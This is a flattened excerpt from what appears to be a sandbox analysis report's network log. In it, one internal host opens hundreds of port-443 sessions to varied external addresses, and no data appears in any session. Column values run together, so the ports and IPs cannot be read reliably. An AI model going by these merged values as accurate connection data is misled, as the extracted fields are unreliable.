                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24380192.168.2.1357396153.120.8.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24381192.168.2.1353958206.252.245.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24382192.168.2.1354342204.66.45.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24383192.168.2.1348000120.95.176.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24384192.168.2.13603165.108.199.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24385192.168.2.1342706102.173.144.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24386192.168.2.13358024.5.151.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24387192.168.2.133521043.67.196.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24388192.168.2.135083019.252.133.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24389192.168.2.134549231.10.44.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24390192.168.2.1352630122.204.64.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24391192.168.2.1341228138.64.194.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24392192.168.2.1342610177.107.198.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24393192.168.2.134607835.43.97.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24394192.168.2.1341486222.46.161.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24395192.168.2.1351406149.64.100.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24396192.168.2.1360964180.206.206.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24397192.168.2.134647439.232.236.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24398192.168.2.133658292.84.87.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24399192.168.2.135433025.82.118.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24400192.168.2.1354174104.226.9.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24401192.168.2.133858864.55.221.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24402192.168.2.1355896164.217.199.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24403192.168.2.1347262180.122.13.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24404192.168.2.1347724120.112.178.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24405192.168.2.1341458194.178.144.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24406192.168.2.1337162191.96.169.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24407192.168.2.135273888.128.253.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24408192.168.2.134499252.94.135.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24409192.168.2.133893266.215.92.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24410192.168.2.1339786168.148.79.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24411192.168.2.1338450169.97.226.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24412192.168.2.1340554117.144.139.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24413192.168.2.135046851.220.208.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24414192.168.2.133789894.94.238.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24415192.168.2.134645854.6.147.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24416192.168.2.135787236.59.222.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24417192.168.2.135938480.94.86.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24418192.168.2.136090620.220.146.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24419192.168.2.1333086168.171.72.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24420192.168.2.133377635.189.184.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24421192.168.2.1351702197.232.29.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24422192.168.2.1334646101.63.68.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24423192.168.2.133623661.100.165.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24424192.168.2.1337798173.205.133.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24425192.168.2.135715673.217.231.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24426192.168.2.1358240117.28.117.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24427192.168.2.1339708156.124.153.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24428192.168.2.1355158161.67.175.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24429192.168.2.134133264.251.139.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24430192.168.2.1343144133.54.52.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24431192.168.2.1356170152.2.135.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24432192.168.2.133643876.242.242.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24433192.168.2.134807299.104.88.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24434192.168.2.1335610208.131.114.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24435192.168.2.135733863.42.177.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24436192.168.2.1345462167.101.8.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24437192.168.2.1344078200.45.21.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24438192.168.2.134015690.179.101.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24439192.168.2.1343550201.168.181.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24440192.168.2.1345266188.182.111.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24441192.168.2.1340038124.255.212.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24442192.168.2.1342912145.65.107.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24443192.168.2.13377881.125.129.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24444192.168.2.1339420107.191.174.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24445192.168.2.134308652.68.222.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24446192.168.2.135598285.248.72.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24447192.168.2.1335178107.60.71.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24448192.168.2.1356168136.152.57.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24449192.168.2.135442668.237.69.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24450192.168.2.1350254222.56.196.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24451192.168.2.1336822131.210.149.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24452192.168.2.1353386137.231.212.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24453192.168.2.134661841.78.76.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24454192.168.2.134378049.144.19.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24455192.168.2.1333688105.244.104.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24456192.168.2.135622212.41.240.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24457192.168.2.133713465.248.129.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24458192.168.2.134521836.159.21.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24459192.168.2.1354700133.234.168.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24460192.168.2.1342194169.113.192.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24461192.168.2.134126262.161.55.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24462192.168.2.135866662.1.216.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24463192.168.2.1333064156.28.173.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24464192.168.2.1339298125.60.103.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24465192.168.2.1345930116.227.254.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24466192.168.2.1338032195.24.222.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24467192.168.2.1350198187.69.80.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24468192.168.2.1353976147.253.179.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24469192.168.2.1341968183.146.167.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24470192.168.2.1336484209.104.115.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24471192.168.2.1345300206.73.174.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24472192.168.2.1341070221.136.238.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24473192.168.2.133649685.235.147.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24474192.168.2.135764638.187.93.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24475192.168.2.1358694169.71.99.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24476192.168.2.134842850.141.68.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24477192.168.2.1342780220.74.12.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24478192.168.2.135474038.107.221.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24479192.168.2.1339212209.132.91.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24480192.168.2.1359826156.7.31.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24481192.168.2.136024618.74.223.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24482192.168.2.1342916218.38.169.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24483192.168.2.1347510173.231.115.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24484192.168.2.135038834.213.206.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24485192.168.2.1350700115.134.7.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24486192.168.2.1358076166.93.161.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24487192.168.2.134244085.98.105.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24488192.168.2.1342442157.136.68.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24489192.168.2.1347786203.145.155.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24490192.168.2.1337502117.211.171.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24491192.168.2.1352196187.73.130.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24492192.168.2.1357686113.104.57.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24493192.168.2.1348826164.13.146.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24494192.168.2.135777069.64.89.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24495192.168.2.1356544222.172.227.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24496192.168.2.133400850.171.233.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24497192.168.2.1344204148.89.251.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24498192.168.2.1343886137.93.223.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24499192.168.2.1344318154.35.148.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24500192.168.2.133337424.121.231.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24501192.168.2.1356244163.189.90.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24502192.168.2.135812278.95.89.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24503192.168.2.1357416187.103.159.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24504192.168.2.1345554122.219.12.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24505192.168.2.1337142129.108.192.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24506192.168.2.134059095.240.205.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24507192.168.2.133620223.40.26.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24508192.168.2.134687434.252.74.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24509192.168.2.1339182145.59.223.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24510192.168.2.135454071.3.130.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24511192.168.2.1360008117.35.208.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24512192.168.2.1347616189.100.66.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24513192.168.2.1350370114.109.252.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24514192.168.2.133371867.58.72.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24515192.168.2.1344572142.165.107.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24516192.168.2.1341646171.15.75.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24517192.168.2.134740832.220.151.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24518192.168.2.1346648198.172.96.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24519192.168.2.133662697.22.198.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24520192.168.2.135760058.186.228.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24521192.168.2.1339166157.77.178.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24522192.168.2.1350614162.126.44.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24523192.168.2.1354766181.67.230.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24524192.168.2.135263459.32.47.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24525192.168.2.134154295.59.162.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24526192.168.2.134038620.254.166.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24527192.168.2.134818834.6.37.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24528192.168.2.1341618184.82.158.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24529192.168.2.135143466.91.124.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24530192.168.2.1352762171.177.55.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24531192.168.2.1338334223.105.157.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24532192.168.2.1357744223.170.36.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24533192.168.2.1336318223.117.120.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24534192.168.2.1339678122.2.79.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24535192.168.2.1337814121.155.147.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24536192.168.2.135043645.194.237.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24537192.168.2.1346488106.223.31.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24538192.168.2.1360010120.79.220.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24539192.168.2.134129257.220.147.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24540192.168.2.1356044204.232.211.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24541192.168.2.1359348183.120.111.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24542192.168.2.1335326206.217.40.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24543192.168.2.135031497.103.107.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24544192.168.2.133605676.186.165.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24545192.168.2.135897484.112.90.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24546192.168.2.1348150210.53.129.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24547192.168.2.1359366112.239.194.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24548192.168.2.1351942210.251.22.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24549192.168.2.1352946223.201.202.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24550192.168.2.135689480.76.152.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24551192.168.2.134414082.146.52.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24552192.168.2.135599850.229.183.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24553192.168.2.134880625.250.86.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24554192.168.2.134033286.107.102.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24555192.168.2.133635678.8.93.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24556192.168.2.134187025.81.67.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24557192.168.2.1350634219.13.223.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24558192.168.2.1354964159.103.160.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24559192.168.2.1358144167.131.179.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24560192.168.2.1341714218.120.239.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24561192.168.2.134409497.41.50.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24562192.168.2.1345084220.44.150.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24563192.168.2.134512664.11.198.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24564192.168.2.135781065.14.210.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24565192.168.2.136081481.203.201.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24566192.168.2.134976678.148.163.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24567192.168.2.1358244123.157.216.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24568192.168.2.135154441.232.112.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24569192.168.2.133885872.242.98.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24570192.168.2.135929217.220.12.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24571192.168.2.134163091.172.94.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24572192.168.2.1350238193.155.99.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24573192.168.2.133535641.48.82.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24574192.168.2.1343884117.178.41.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24575192.168.2.1347982124.168.19.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24576192.168.2.1350066108.5.98.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24577192.168.2.1343926217.144.241.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24578192.168.2.1344440200.188.29.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24579192.168.2.1358804193.29.249.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24580192.168.2.1346640147.40.13.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24581192.168.2.135434094.175.196.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24582192.168.2.135249617.235.101.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24583192.168.2.135353678.203.147.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24584192.168.2.1333754200.196.91.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24585192.168.2.134701269.87.146.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24586192.168.2.1357860108.92.187.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24587192.168.2.13473541.181.8.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24588192.168.2.1356208119.121.212.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24589192.168.2.1334306156.202.98.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24590192.168.2.1356040137.224.52.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24591192.168.2.1348240135.123.168.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24592192.168.2.133506242.65.44.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24593192.168.2.1337448202.135.93.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24594192.168.2.13358564.117.199.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24595192.168.2.1336122211.59.34.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24596192.168.2.135759032.239.23.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24597192.168.2.1356386113.9.166.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24598192.168.2.133331660.104.221.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24599192.168.2.1343748167.7.96.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24600192.168.2.1343440137.189.71.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24601192.168.2.1353778205.20.95.174443
